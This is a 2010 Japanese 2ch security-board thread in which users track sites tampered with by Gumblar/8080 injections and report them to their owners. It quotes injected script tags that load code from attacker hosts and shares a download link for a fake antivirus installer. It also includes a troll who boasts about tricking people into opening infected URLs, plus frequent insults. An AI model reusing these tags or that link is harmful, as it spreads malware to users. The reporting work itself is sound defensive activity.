▼サイト改ざん猛威：感染パソコンの修復は「OSの再インストール」が近道
ttp://www.so-net.ne.jp/security/news/library/2166.html

これだけ添付しておけばきっとわかってくれｒ(ry

>>164
WHOISからめるぽ。
さくらにもつーほーすたお。

spam ; 終わらないサイトの改竄
ttp://slashdot.jp/~LARTH/journal/514123

岡山はんこ広場
www.hanko-okayama●jp
→nuttypiano●com/E-mail.js (いつもの)

こんなページが設置されていたり。
www.hanko-okayama●jp/where34.html
→www.drugsad●com (薬屋さん)
→nakulan.co●in/_vti_script/h-clearance.php (いつもの)

>>166
〜34.htmlにGumblarっぽいのが寄生してるなｗ

ウイルススキャンしたら80個物の感染jsファイルがあってﾜﾛｽ
幸い削除できたから一安心出来ない

ヒント：誤検出

だとええなぁ avastだからなぁ

取扱注意
www●keiolax●com

92.243.84.187.addr.datapoint.ru Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)
h ttp://うちのサイト/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=

↑が存在しないディレクトリに直接やって来ていた
tiny_mce改竄系か

http://www.roque.net/site/jar.nsf/Hackers!OpenPage

やっぱそうだった

直リンすんなカス 死ねや

>>151
無害とは言え、今現在もコードが残ったままとは・・
フィールドシステム完璧にオワタｗｗ

取扱注意
file●asobube●com／sansyoku／index●html

マグロと一緒にウィルスも食わされるとは…！

>>176
だれうまｗ
メル凸済み

rockmansbible○hp○infoseek○co○jp

Trojan:JS/Redirector.DC検出

>>176 つまんね お前はサーモンでも食ってろボケ

>>178 </HTML>の下だな 暗号化されてる部分のC=M("〜");を復号化すると
/google●com/mininova●org/youdao●com●phpになるな

>>177
ttp://sucuri.net/malware/entry/MW:SIPRO:1
注：玄人向け

参照
MW:JS:151
MW:JS:152

>>178
"Trojan:JS/Redirector.DC"という事はMSEか　やばいね

え？

>>2,3の対策しててもWebシールド機能無しのセキュリティソフトじゃ防げないとでも言いたいのでは

>>180 だから何

お前の小さな脳味噌で考えれば

system doctor 2006をダウンロードしたいのですが、まだ生き残ってますかね？
どなたかplz

>>187

ttp://web.archive.org/web/20070117074533/http://cdn.downloadcontrol.com/files/installers/SystemDoctor2006FreeInstall_jp.exe
自己責任でな 元々サイトが死んでるから実行出来るかはｼﾗﾈ

>>188 リンク切れでした・・・
　偽アンチウイルスソフトでダウンロードできるとこって何かないですか？
　

ttp://web.archive.org/web/20070117074533/cdn.downloadcontrol.com/files/installers/SystemDoctor2006FreeInstall_jp.exe
これでやってみたらどうだ

>>190 できた。ありがとう。
　これでアンチウイルスの性能評価できる。

最近のガンブラーって感染すると偽物セキュリティー入れてくるだけ？
それとも情報盗まれる？

>>192
試してみるのオヌヌメ

>>193
試せたらここで聞いてないわｗ

ホントに最近不毛な返しが多いな……
「PCすてれば」とか「ためせば」とか「javaきればおｋおｋ」とか
相手にガブガブする奴も多いし

【陥落サイトのURL悪用厳禁】
ueno-syoten●com/

>>195
荒れるのは「仕様」なので我慢して下さい

www5●ocn●ne●jp/~kobadent/
www16●ocn●ne●jp/~moyogi/
www31●ocn●ne●jp/~jbc/
www4●ocn●ne●jp/~minorisk/
www8●ocn●ne●jp/~iyashiro/
www18●ocn●ne●jp/~serec/ ＜Gumblar.X＞

>>192
感染後の流れはここの「第3段階」のところ
今でも変わってないと思う
blog.trendmicro.co.jp/archives/3340

冗談ではなく、何が行なわれるかは実際に感染しないと分からん
PCが乗っ取られるので、攻撃者のやりたい放題状態になる

>>198
なるほど、情報サンクス

【陥落サイトのURL悪用厳禁】
8080(旧型)
www●kireibast●sakura●ne●jp/〜
↓
ttp://search.yahoo.co.jp/search?p=site%3Awww●kireibast●sakura●ne●jp&aq=-1&oq=&ei=UTF-8&fr=sfp_as&x=wrt
>約2,310件

たぶんGumblar.x
sugimotokairo●net/index●h

その他(下段は改竄祭り絶賛開催中)
www6●atpages●jp/ryumazin
istanbulyelken●com/iyk/templates_c/index1●html

bigkaden2010net.shop-pro●jp/

【陥落サイトのURL悪用厳禁】
www●mspinjapan●com/

【陥落サイトのURL悪用厳禁】
www●foresto-ne●com/

Adobe Reader、Acrobatに新たなゼロデイ攻撃
ttp://internet.watch.impress.co.jp/docs/news/20100909_392583.html

悪用厳禁とか書いてるやつマジわりー野郎だなﾆﾋﾋﾋ
（�Vд�V）いい加減俺様みたいなのが悪用するのわかって貼ってるだろ

お前が悪用してもたかがしれてるわ

と、俺様の煽りに早速馬鹿が釣れたわい
こういう反応を高みの見物するの好き(�Vд�V)v ｲｪｨ

何やってんだ？
早く悪用してみろよ糞ガキ

高みの見物
意 味：物事の成り行きを、第三者として傍観すること。

>>205
33323335333433353333333733323335333333393334333633323335333433313333333533323335
33343335333333373332333533333339333433313332333533333338333333343332333533343335
33333339333233353333333933343331333233353333333933343333333233353334333533333335
33323335333433313334333533323335333433323333333333323335333433353333333833323335
33333338333333303332333533333338333333353332333533343335333333343332333533343332
33333339333233353333333933333339

取扱注意w
ruhuraro●blog57●fc2●com/

fc2のブログもターゲットになったか

33333333333333353333333533363331333333323336333233333333333333363333333333333335
33333335333633313333333733333339333333373333333733333333333333353333333633333331
33333335333333333333333533333337333333333333333433333333333333343333333433333337
33333337333333353333333333333335333333373333333233333335333333333333333333333337
33333333333333353333333533333339333333373333333533333335333333363333333333333335
33333333333333363333333633333331333333343333333233333333333333353333333733333331
3333333333333332333333363333333930643061

>>212
馬鹿？

んー8080系はドメインがだいぶ死んじゃってて検体が入手できん

> 16287 個のドメインを感染させています
www.google.com/safebrowsing/diagnostic?site=nuttypiano.com&hl=ja

だいぶ大きいけど、去年の初代Gumblar（GENO）はピーク時６万
googleonlinesecurity.blogspot.com/2009/06/top-10-malware-sites.html

◆yUyb3Tqn92 これからもどんどん初心者釣ってくれ 初心者が2chに増えすぎていい加減ウザイと思ってきた頃だ

自分で自分を応援するのか
胸が熱くなるな…

>>217
マジキチだから仕方がないｗ

古参(笑)ばかりの2chもつまらんだろうに

おいおい俺様の話題で持ちきりだな
でも俺様にムカついちゃった奴の自演なのだろう
他の書き込みを自演と決め付けている被害妄想をしてるのがなによりの証拠だぜ
自演大好きな奴にありがちな被害妄想乙(＞ｗ＜)お見通し！


(�Vд�V)でもそんなに悔しかったら俺様のようにコテつけて堂々と書き込めばいいのにね

いろいろな有名なサイトまでが被害に遭っているが
中には俺様が踏ませたことによって感染につながった連中もいるのだろうな

(*�Vд�V*)でも俺様ぴんぴんしてるおw
踏ませるだけなら加害者でも被害者でもない
なので第三者同然(＞ｗ＜)メシウマ爽快学会！

ホント過疎ってるなこのスレ
先に立ったあのスレで>>1のスレ番ミスを厳しく指摘した上に死ねとまで言った効果は抜群だったか

>>220
お前が勝ちなのは当然だろ
街中歩いてて通り魔に刺されるなんて思ってる奴いないんだから
お前に突然危険URL踏まされる奴らだって同じこと

全然同じじゃねーだろ
ウィルスURL踏むのは踏む奴の意思で踏んでるわけだからな

(�Vд�V)俺様はそいつが踏むように心理誘導してるだけ
ネットやってて自分がウィルスかからないと思ってURL開いてる奴がいるとしたらそいつは低脳以外何者でもねーぜ
そういう意味じゃ俺様がやってることは確かに正義と言っても過言ではないかもな。必要悪という名の正義があっても良いと思うんだ(w)

>>224
ちなみにアンチウイルスソフトは何を使ってるの？
やっぱ情弱御用達のavast!かなｗ

>>225
おいおい(＞ｗ＜)
てことはお前アンチウィルスソフトに頼ってるのか？(＞ｗ＜)ﾌﾟｸｰｽｽｽスwwwww
お前みたいにどんなソフトを入れてればいいかどうかって考えてる時点で不合格。
情弱乙(＞ｗ＜)レベル低っ！


( �Vд�V )やっぱ俺様って論破の天才だね

そして人をムカつかせるのが得意だな(@�Vд�V@)←この顔文字余計ムカつくでしょーｗえへへーｗｗｗ

その顔文字好きだからずっと使ってね

スキルないくせに態度だけはでかいな糞ガキ

(　　　　　　　　　　�Vд�V　　　　　　　　　　　　)

(　　　　　　　　　　�Vд�V　　　　　　　　　　　　)
お　　　　　　　　　　や　　　　　す　　　　　　　　み

(　　　　　　　　　　�Vд�V　　　　　　　　　　　　)

>>229
そうやって頭にきた素振り見せると余計顔文字喜ばせるだけだぞ
それに>>225-226は確かにお前より顔文字の方が正論だから仕方ない

>>231
おれはお前好きだ
このスレ頭固い奴ばかりだから
またきてくれ、おやすみ

バレバレの自演するなよ
低脳だからこれくらいが限界か

IDないスレで自演自演言う奴ってｗｗｗｗ
そんなに必死になるならIDあるスレいけよ低脳ｗｗｗｗｗ

やべ俺まで正論言っちまったｗｗｗｗ

>>232
FF14スレにも出没してたでしょ
FF14ゲーム内のgumblarってもしかしてあなた？

ID無くてもなんかわかっちゃうな…
エスパー養成講座みたいだ

『馬鹿の一つ覚え』
意 味：愚かな者は一つの事だけを覚え、それをどんな場合にも得意になって持ち出す。
同じ事を何度も繰り返して言う人を皮肉った言葉。

顔文字のためにあるような諺（ことわざ）だなｗ

なぜセキュ板は自分の考えと違う者に排他的な人が多いのか

240 ：名無しさん＠お腹いっぱい。：2010/09/11(土) 11:06:56
『馬鹿の一つ覚え』
意 味：愚かな者は一つの事だけを覚え、それをどんな場合にも得意になって持ち出す。
同じ事を何度も繰り返して言う人を皮肉った言葉。

顔文字のためにあるような諺（ことわざ）だなｗ

241 ：名無しさん＠お腹いっぱい。：2010/09/11(土) 11:07:18
なぜセキュ板は自分の考えと違う者に排他的な人が多いのか






顔文字にコケにされて悔しいのはわかるが
自演下手すぎ＾＾；せめて一分以上は時間あけようぜ
あｗ残念ながら俺はお前が戦ってる顔文字じゃないからね！悪いが＾＾

あれをコケにしてやったと思ってるのか

構ってちゃんに構うお前らもどうかと思うけど(;^_^)
なんで無視できないでレス返すんだろ(;^_^)

iswebが終了すると聞いて
自分のサイトの別館があるgeocitiesのファイルマネージャを1年ぶりくらいに開いたら
スクリプトタグが大量に書き込まれていて広告ページが勝手に作られていた
これはもうだめかね

iswebｗｗ
おまえわおれか。

10月に追い出されるよー、めんどくさいよー。

本家のWebGetterって今死んでますよね？

"Canadian Pharmacy" domains
ttp://www.mywot.com/en/forum/7508--canadian-pharmacy-domains?comment-43426

.ru 多すぎだろｗ

誰かリスト作ってくれないかな

言い出しっぺの法則

言いだしっぺは今期も知識もないヘタレの法則

>>249
WOT入れろよ

新ドメインきたー
scarystroke●ru/●●●●.js

>>249
まあ「自分だけが本質を解っている」妄想がここまで強いともう矯正不可能だろうね

ホームページに関する報告とお詫び
ttp://www.sumori.jp/news/index.php?e=81

McAfee SiteAdvisor
ttp://siteadvisor.jp/sites/sumori.jp/postid?p=5162331

改竄されてたことを正直に書かないのに「正直な家造り」ですか・・

SANSPO.COM
日本に「報復」！中国ハッカー組織が攻撃宣言
http://www.sanspo.com/shakai/news/100913/sha1009132256024-n1.htm

攻撃増えるらしい

「Flash Player」にゼロデイ攻撃--「Adobe Reader」と「Acrobat」にも影響
ttp://japan.cnet.com/sp/zeroday/story/0,3800105600,20419956,00.htm

またおまえ(Adobe)か！

BADbe…

しかもこれ再来週まで治らないだと？ふざけんじゃねえよ・・・
ニコニコも一時閉鎖するくらいしないとダメじゃねえか？

アドベの社員は全員毒殺銃殺絞首刑に処すべき

>>260
それだと脆弱性放置になってしまうから
社員全員24時間勤務(休憩無し・メシ抜き)で最速対応のほうが…

今後ゼロデイが発覚したら社員全員尻叩き1万発
※重役の尻叩きの様子はようつべで公開

まあニコニコで騒ぎになってないなら大丈夫だろ

この場合、危険なのは動画サイトだけ？
それとも動画サイト以外もこのゼロデイの対象なのかな

なんで動画サイト限定なんだよ
Flash全てだよ

ハッカーが仕組んだ動画やFlashのページに行っただけでアウトっぽいな
こっちで先に読みこんじゃってるからなぁ

>>261 結局社員が過労死する訳か

>>265
俺はFirefox＋Stop Autoplayに避難した

まぁYouTube見るだけならHTML5対応ブラウザで
ttp://www.youtube.com/html5
で有効にすりゃFlash使わんで済むな

gnashに変えた。
いつも見てるページは問題ないみたいだからこのまま行こうかな。

俺はエロページの新規探索をしないことにした

>>269
グナッシュ重くね？動画だけでなく普通のFlashもクソ重いんだけど
ただアドベのタダメシ喰らい共には二度と世話に
なりたくない点では迷いなく同意だが

Security Advisory for Flash Player
http://www.adobe.com/support/security/advisories/apsa10-03.html

Adobe Flash Playerは米国時間9月20日にリリース
Google Chrome内蔵Flashは10.1.85.3に本日更新済み

やっとかよ

１０月とか言ってなかったっけ
まあいいけど

10月はAdobeReader(Acrobat)

褒める価値もない これくらいやるのは企業として当然の義務

Flash Player 10.1.85.3 キタ！

今更かよ何やってたんだこのクズ企業

クズ起業のソフト使わないといけない奴もクズなんだよな

流れ的に見て
>>205の影響で最近URL貼るの自重してるんだな
新しいの見つけたので貼ろうと思ったが自重しとく

凸してる側の俺としては、報告はありがたいのだが。

悪用されたところで、ちゃんとアップデートしていれば問題ないんだし、
これだけ騒がれて未だにアップデートもしないずさんな奴は
自重しても別のウィルスに感染するだろ。

だな。
というか1匹のアホのせいで情報の提供・共有に臆するようになったら本末転倒じゃね。

>>280
8080が一時撤退していたからな
現在、放置サイトを中心に新ドメインで再起動中

44Gr44GC44GG44G144GP44Gp44Gj44Go44GT44KA
ここみればわかるんじゃね？

>>284
不定期で観測してるけど
また、動きあったん？

てか、今見たら飛び先の飛び先がまた変わってた。。。おｒｚ。。。。
よく見たら別のXの蜜壷化してるとこの飛び先になってた。
つーことは8080じゃなくてXだったんか>>284

>>285訂正
ホスト勘違いすた。
>>285は忘れてちょ。m(_ _)m

>>286
下段のphp
・jsunpack
09d45fc74d80a65f539b612e6a90739abfe61186

>>287
ノ
あらら、中身かわっちゃたのねぇ。。。
自分が投げた時の
fc588961ef3119b8dc764166e8454389983601ff

昨日検体送った分で、>>287の飛び先もあったからどーすべ。

>>287
とりあえず送ったお。
jsunpack使わせていただきました。m(_ _)m
（何度もアクセスさせるとjsunpackも拒否られるようなので。）

久しぶりにきたら、アホが復活してるのね・・・
フラッシュプレイヤー、更新したほうが良い？

んなアホな質問するような人は来なくていいです

>>290
そのまま阿呆に死ね

ここの住人は陥落サイトを発見できるスキルのある人が選民意識を持ってやってる
初心者はうせろ

自己紹介は他所でやれ
あるいは死ね

またアンタか…つくづく暇な奴だな

またアンタか…つくづく暇な奴だな

取扱注意
www●okestyles●com/mainframe●asp?c=1 (〜529あたりまで延々と...)
※改竄を放置したまま下記サイトに逃亡
www●okestyleszakka●com

アクセス注意
en-trance●co●jp
※>>130参照
完璧にオワタｗｗｗｗｗｗｗ

>>297
おちゅ。
JPCERT/CCにもめるぽすた。

en-trance●co●jp
またコードが変わったなｗ

>>299
今度は伊太利亜語れすか。。。

aHR0cDovL3RyYW5zbGF0ZS5nb29nbGUuY29tL3RyYW5zbGF0ZV90P3RleHQ9YXVtZW50YXJlJTIw
Y29tZSUyMGwlMjBlcmV6aW9uZSUyMHRoZSUyMG9mJTIwZmFybWFjbyUyMHpvbG9mdCUyMHR3byUy
MHJlbWFpbnMlMjBjaGVhcCUyMGdlbmVyaWNzJTIwc2l0ZXMlMjBzaXRlcyUyMHRvJTIwYW5kJTIw
aW1wb3RlbnphJTIwc2ludG9taSUyMHByZXNjcmlwdGlvbiUyMHBvc29sb2dpYSUyMHBsYW5uaW5n
JTIweGFuYXglMjBhbGxlcmdpYSUyMHBwZCUyMHRoZSUyMGElMjBhY2NvdW50JTIwb2YlMjBhZGRz
JTJDJTIwdGhlJTIwYmUlMjBjbGElMjBtZWdhJTIwZXhhbWluaW5nJTIwYW5kJTIwc2VyaW91cyUy
MGFyZSUyMHNjaWVudGlzdHMlMjBpdCUyMGZyaWVuZHMlMkUlMjBtZXJjZWRlcyUyMGNsYSUyMDI5
JTIwc2FmZXR5JTIwcHJhY3RpdGlvbmVycyUyMGludGVyYWN0aW9ucyUyMG1vZHVyZXRpYyUyMHBl
ciUyMGRpbWFncmlyZSUyMHNpdGVzJTIwZGklMjBwZXIlMjBzbWV0dGVyZSUyMGZ1bWFyZSUyMGxp
YnJvJTIwb2ZmZXJlZCUyMGElMjBpbCUyMHVuaXZlcnNpdHklMjBhbiUyMGxldHRlcnMlMjB0byUy
MGlzJTIwc3BvcnQlMjBncmF2aWRhbnphJTIwYXZlcmFnZSUyMGElMjBQcm90ZWN0aW9uJTJFJTIw
YXJ0cml0ZSUyMGFjdXRhJTIwSW4lMjBubyUyMHdpdGglMjBhbmQlMjBuZWVkJTIwcGlhbmNhdmFs
bG8lMjBkaW1hZ3JpbWVudG8lMjBzdGF0ZSUyMGNlbnRybyUyMGtpbmQlMjBtaWNhcmRpcyUyMGJv
ZWhyaW5nZXIlMjBhbmQlMjB3aG9sZSUyMGFsaSUyMGxlJTIwYXByaSUyMGNvbXBhbnklMjB0aGF0
JTIwc291cmNlcyUyMGlzJTIwdGhlJTIwdGhlJTIwZGlhYmV0ZSUyMGludGVybmV0JTIwdG8lMjBw
cmV2ZW56aW9uZSUyMEluYyUyRSUyQyUyMGluY2x1ZGluZyUyMHA1MyUyMGUlMjBjYW5jcm8lMjBw
cm92aWRlJTIwc29jaWFsJTIwZW50cmVwcmVuZXVyJTIwYXdhcmQlMjBwcmVzY3JpcHRpb24lMjBk
YW5nZXIlMjBpbnZvbHZlZCUyMHBhcnQlMjBkaWFiZXRlJTIwYXR0aXZpdGElMjBmaXNpY2ElMjBh
Ym91dCUyMGlzJTIwc3RheSUyMHNlZ25vJTIwc2NvcnBpb25lJTIwZW5zdXJlJTIwc3VjaCUyMGFs
bGVyZ2lhJTIwYWdsaW8lMjBwb3dlcnMlMjBmZXclMjBvZiUyMGFuZCUyMHBhc3QlMjBjYXB0b3By
aWwlMjBlbmFsYXByaWwlMjBleWUlMjBzYXlzJTIwdGVybWlub2xvZ3klMjBGVENzJTIwYSUyMElu
JTIwZm9iaWElMjBzb2NpYWxlJTIwdGhlJTIwbmFtZSUyMGNvbmNlcm5zJTJDJmxhbmdwYWlyPWl0
fGphJmhsPWphJmllPVVURjgj

>>300σ(ﾟ∀ﾟ ∬ｵﾚだけど、ぐぐる翻訳のバグかな？
英語だとｇｄｇｄになっちゃう。

>>299
これもガンブラーなんだ

なんか、こんな事が起きて
ttp://slashdot.jp/slash/10/09/24/1641224.shtml

こんな事になってるらしい
http://yuzuru.2ch.net/test/read.cgi/news4vip/1285344748/
http://hibari.2ch.net/test/read.cgi/sec/1283256398/630-633

リンク貼る前に口頭で説明しろ

「security tool」に感染した方へ
よくわかってない人が書いてるsecurity toolの削除方法では
8080の本体（高機能ダウンローダー）のほうを潰してないので、
セキュリティ的には何もしてないのと同じです（まともに動くようにしただけ）

8080の本体を潰さない不完全な削除はらネットに繋いでるだけで他人に迷惑をかけている（可能性が非常に高い）ので、
必要なデータをバックアップした後にリカバリ（クリーンインストール）を行って下さい。
※複数のセキュリティソフトで膨大な時間を費やして不完全な削除（HDDをゴリゴリ鳴かせて寿命を縮める）より、
リカバリ一発のほうが遥かに早くて確実です。

security tool削除で以前話題になったサイト、
1000円払えば教えてくれるらしいよ
ttp://8.pro.tok2.com/~miyuki-net-school/

security toolってどういう状況で感染するんだ

無防備都市

>>2,3の対策してなければやばい
Webシールド機能無しのセキュリティソフトも微妙

感染動画とかあれば見てみたいな

>>310
YouTube - 「衝撃！！ウイルス感染のその瞬間　前編」
http://www.youtube.com/watch?v=ijb-fNMA8Aw&feature=related

偽セキュリティーソフトがインスコされるのか

>>307
発言がいちいち恥ずかしいから黙ってみてろ

>>306
あのくそじじい･･･まだ懲りてないのかｗｗｗ

不正プログラム：毎日ｊｐなど被害　広告配信データ改ざん
ttp://mainichi.jp/select/biz/it/news/20100925k0000e040051000c.html

今回の改ざんでWMPが起動したって書き込みをちらほらと見かけるんだが、WMPになんか脆弱性あったっけ？

>>316
ヒント：自動再生

今回のパンデミックで日本にはセキュリティソフトに依存してるバカが異常に多いという事がよくわかった

>>317
自動再生ってリムーバブルディスク挿した時とかのアレ？

jsunpackの調子がおかしいっぽいのは漏れだけ？

なんかもう完全に日本だけが狙い撃ちにされてんな

ソフトウェアのアップデート切ったり、サポート切れたOSを使い続けたりしてるんだから狙い撃ちにされて当然

時期的に考えてチャイニーズ・ニート（ｽｰﾊﾟｰﾊｶｰ）の仕業だろ
船長の件で「あんな事（保障しろとか、無茶苦茶な要求まで）」言われてるんだから
日本もｽｰﾊﾟｰﾊｶｰにやられたサイトの復旧費用を請求すべき
200兆円くらい（）笑

【GENOウイルス】GIGAZINEの広告がウイルス感染、他のサイトでも同様の被害か
http://kamome.2ch.net/test/read.cgi/news/1285541363/

クソサイト
ttp://gumblar8080taisaku.com/
またECスタジオのEset宣伝サイト

メルアド収集サイト

>ガンブラーのような未知のウィルスに対し
>圧倒的に強いセキュリティソフトはESET Smart Securityです

ワロタｗｗｗｗ

まだやってやがんのかよGumblar作者はよ！
ほんと殺してやりてぇ

>ガンブラー制作者
いい加減に捕まえてほしいねぇ・・・

ただ、実際に捕まるのは。三流制作者の原田ウイルスやKenzeroぐらいだよなぁ・・・
あれはアホすぎ。

つーか、ただの実行ファイルを配って、ユーザーに実行させている時点で
そもそもあれはウイルスじゃないよな。

新種のガンブラーは去年の12月23日くらい騒ぎになったんだっけ？
で、アドビは休みに入るから対応遅れるけど よろしくねー的な対応だった気が・・・

>>331
あれは酷かった・・・
さんざん機能拡張した挙句
脆弱性だらけのものを作っておきながら
感染拡大状態から対応に約一ヶ月かかった。
http://www.so-net.ne.jp/security/news/library/2118.html

今もAdobeReader放置のままだしね
来月4日「の週」の予定

readerなんて使わねーだろ

pdfはサンドボックスで開くようにすればいい。

【ゼロデイ多発】Adobe≒Badbe【叩きサラダ】

取扱注意
tukaoh●com/index●html

ドライブ・バイ・ダウンロード攻撃によるAdobe Readerゼロデイ脆弱性の悪用
ttps://www-950.ibm.com/blogs/tokyo-soc/entry/adobe_0day_20100928?lang=ja

みんな、なんであれだけ脆弱性でやられまくっても、
XPやFirefox使い続けるんだろ？

Vista以降・IEで保護モードオンorChrome・一般ユーザーでログイン
の3つを組み合わせたら相当安全性高まるのにね

このまえアップデートされたFlash最新版では、特定サイトで数十秒間フリーズするっていう問題があって、
たまにそれにあうな

サードパーティーのFlashクッキーを受け入れない設定にしてニコニコ動画見た場合とかそれにあう
その他にも条件不明だけどたまに数十秒間フリーズするサイトがある

>>340
動画サイトを見ていてそうなったことがあったかも。
その現象について書かれたサイトってあったりする？

以前のverのFlashだと脆弱性があるって聞くし、
アップデートしといた方が良いんだろうけど、
ブラウザごとのフリーズくらいなら我慢するしかないのか・・・

サードパーティーのクッキーとかはサイトごとに保存するかどうか設定できなかったっけ

APSB10-22がfixされたラボのFlashPlayer10.2preview2はどうよ？
人柱版なんで別の未知の穴あいてるかもしれないけど

>>339
基本的な対策を怠ってる愚か者は何を使っても喰らうから、OSとかブラウザはあまり関係無い。

そして真の愚か者は、HIPSが止めたものを確認もしないで「はい(実行)」を押して感染するｗ

security toolをダウンロードしたいんだが、まだDl可能なURLある？

マイクロソフト セキュリティ情報 MS10-070 - 重要
ASP.NET の脆弱性により、情報漏えいが起こる (2418042)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms10-070.mspx
NET Frameworkオワタ

パッチ済みなのに何を言ってるんだ

>>345
なんに使うん？
広告サーバー改竄でSecurityToolがアップロード
されてた所はまだ稼動しておるが

なんに使うって…そりゃ悪い事だよなァ？

http://www.microad.jp/press/20100925/
>弊社にて確認したところ9月24日23:30頃には悪意あるサイトへの転送は停止しておりました。

25日1時ごろまでドライブバイ･ダウンロード状態だったはず
GIGAZINEでの確認も9月24日(金)23時59分22秒だし↓
http://gigazine.net/index.php?/news/comments/20100927_security_tool/

詳細を告知すりゃ名誉挽回できるのに残念

残念とか関係者か？
どうでも良いだろ

よく理解できないがそのサイト張りまくってるのはその件に関係してるのかな

詳細が告知されれば、同様被害を減らせるでしょ
改竄されたのは残念だけど、失敗の経験を共有したい

繕うとすると可笑しなことに↓なるし
ttp://mimizun.com/log/2ch/sec/1274675964/118-

残念でも何でもないが
意味が分からないな

漏れが件の広告枠をダンさんとこで最終確認したのは 2010/09/24 23:16 頃だたぁーよ。
>>303の頃にはメルしてた。

広告枠のタグのアドレス→転送サイト自体が蹴りまくっていたようなので環境によっては>>350になるかも。（転送先アドレスも含めてダンさん蹴られてた。）
aguseで転送サイトから転送先アドレスの最終確認は 2010/09/25 01:38 頃。

取扱注意

www●cyg●jp/
>サイバーギグスのWEBサイト制作は（中略）1ページ1万円という低価…
↓
www●movie-aa●com/
<title>サイバーギグス｜PV制作｜専門用語集｜-あ行-｜
＜script src=ｈｔｔｐ://pop●dj/en/sitemap●php ＞＜/script＞映画とは？</title>

他人の心配をする前に、自社のサイトが改竄されてるのを何とかしてくださいｗ

【Google先生の診断結果】
www.google.com/safebrowsing/diagnostic?site=www●movie-aa●com/&hl=ja
>疑わしいサイトとして認識されています。>このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
>Google が最後にこのサイトを巡回したのは2010-09-30で、このサイトで不審なコンテンツが最後に検出されたのは2010-09-30です。

ぐっじょぶｗｗｗｗｗ

>>356
otu

JSUNPACK
f6e5de3faf0333e2e04d04c1ad02c0562cee14c7
6bbf617a256b2c06b91fcf74daad67035fa0a410

VIRUSTOTAL.
b6cf294f8fc9ecfe0a57ec6ee74f751ec3479aeba7b85265839bec7c36a4f6ba
daeea74be1aced7dfee6065d8eaa0b7b168faf1368e5bac8d327cc522153bab7

タグはDanさんとこ蹴っている。。。

めるぽかんりょ

>>357
つづき

Avira対応予定
HTML/ScrInject.G
JS/Dldr.Agent.abb


あきたねる

こういった底辺web制作会社のPCがトロイにやられて、担当する顧客のwebサイトの
FTPパス抜かれまくって改竄されるんだろうな

こんなもん感染するわけないじゃん。

>>357-359 乙乙

取扱注意
・google-statsXX系
www●snowfan-mimo●com/area/area-service●asp?sID=467
sID＝XXXが全滅の予感

【Google先生の(ry
www.google.com/safebrowsing/diagnostic?site=www●snowfan-mimo●com/&hl=ja
>146 ページのうち 74 ページで、ユーザーの同意なしに不正なソフ…

>>362
こちらの環境では500返ってきます。
ヤホのキャッシュで確認しましたが誘導先のstats50はないようです。。。

スクリプトを抜き出してVTに投げてみました。
833e2f264ae0ec69445fdc6d070312b564654cd72480b8c1465478401af77658


とか、やってるうちに>>362繋がった。
55ってのもあるんか。。。
ワイルドカードなんかな？

>>362
あらためて乙ですた。
めるぽかんりょっす。

googleの検索結果にこう出てるんですけど、やっぱり感染してるのかな？

ツール・ド・安倍峠 - MCプロダクトのページ
このサイトはコンピュータに損害を与える可能性があります。
2010年8月20日 ... ツール・ド・安倍峠 大会事務局 佐藤 治史（サトウ ハルフミ） ※入金の確認が取れた方には、事務局より参加受理書をお送りいたします。 ※ネット銀行よりお振込される方は、 振込先を全て入力して下さい。 ...
www●mc-pro●co●jp/abetouge/abetouge.html

>>365
こんなことがあったようです。（>>353を参考にみてくださいな）
http://yuzuru.2ch.net/test/read.cgi/bicycle/1274359715/820-871　（820、830、836、871）
深くは見ていないので他の方のご意見・報告もお待ちくださいな。


>>362
404になったっぽい。

Avira対応予定
HTML/SrcInject.C
HTML/SrcInject.L
HTML/SrcInject.M
HTML/SrcInject.N
HTML/SrcInject.O

>>365
静岡市・身延町交流イベント実行委員会　　静岡市側 に凸。
市役所に繋がりました。市役所から業者に問い合わせるそうです。

>>366
●がないからみれにゃい。。

>>367
乙です乙です。


> ●
>>366の http://yuzuru.2ch.net/test/read.cgi/bicycle/1274359715/820-871 を>>353のようにすると過去ログがある場合もあります。
mimizun.com/log/2ch/bicycle/1274359715/820-871
（直リンするとみみずんさんの負担が大きいので>>366にしました。）

みみずんさんとこに無い場合もありますん。
2ch DAT落ちスレ ミラー変換機
ttp://mirrorhenkan.g.ribbon.to/
それでも無いことも。。。
●があればパーペキなんですけど。。。orz.....

>>368
みっけ
http://2chnull.info/r/bicycle/1274359715/801-900

>>365
そのページとトップページを見たけど不正コードを確認できない

Googleも最後の検知日が9/20でもう時間が経っちゃてる
　ハッキングされてたのは間違いなんだろうけど
Google警告は管理者が対処完了報告しないと一定期間は消えない

エロ漫画検索してて遭遇したページなんだけど、
開くとメディアプレイヤーアドオンを要求。
で、そのコードが</html>の後にあるのがちょっと怪しい。

blogs●yahoo●co●jp/tmoebooks/2463230●html

どうなんだろ、ここ

判定スレじゃないよここは

こういう上から目線のカスは死ねばいいと思うわ
報告してくれてるだけマシだろ
少なくともおまえのレスよりぜんぜんマシ

上から目線すぎる…

自己弁護乙

報告して「くれてる」とかイミフ

何かわかんないときは質問スレ行くといいよ
ここはどっちかっていうと明らかなやつについて情報交換するスレ

上から目線の使い方が明らかに間違ってる

>>371 >>373
Yahoo!ブログは初めてか? 力抜けよ、どこも同じだから
yimg.jpはYahoo!のファイル置き場な

というかyimgはyahoo関係の画像とかだね

取扱注意

未対応＆再改竄のため再掲載
サイバーギグス
www●movie-aa●com/

・JSUNPACK
3c77eaea56260e02a480ebf8e2bff22b39636c3b

絶賛放置＆崩壊中
iiji●biz/
文字化けして読めませんｗ

>>381
おつですん。

上 二回目　無視かのぉ。。。
下 WHOISからメルってみました。

教えてください

body-shaver●seesaa●net/
collagen-07●seesaa●net/
exercise-repo13●seesaa●net/

はaguse.jpでチェックすると
<script type="text/javascript" src="http://pantscow●ru:8080/Hardware●js"></script>
へのリンクがあると出てきますが、Sauceを見てもどこかがわかりません。

なんか、この間みたいにAdserverから出されているような気がするのですが、どなたかわかりませんか？

わかりました。
sales-agency●jp/flv/swfobject●js
の末尾にありました

>>384
ネットショップ代行会社が感染して
アフィ広告FLASH表示用のjsスクリプトに挿入されてるから
他のブログにも挿入されてる

Last-Modified: Sun, 18 Jul 2010 12:46:15 GMT
改竄されたのが6月と古く　今はpantscow●ruのIPがないので無害だと思うけど
当時はヘルプとサポートのゼロデイ攻撃もあったから効果があったかも

